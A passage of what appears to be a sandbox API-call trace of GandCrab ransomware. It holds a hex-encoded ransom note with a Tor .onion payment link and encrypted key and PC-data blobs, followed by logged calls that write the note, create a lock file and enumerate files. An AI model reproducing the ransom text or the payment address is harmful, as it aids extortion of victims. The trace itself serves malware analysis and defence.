\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.868] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0069.869] CloseHandle (hObject=0x2bc) returned 1 [0069.869] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.869] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.870] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0xb9)) [0069.870] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.870] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.870] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.871] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a09d2ca4deb61a.lock") returned 74 [0069.871] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0069.871] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.871] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\") returned 50 [0069.872] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*" [0069.872] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5036f8 [0069.872] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.872] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.872] 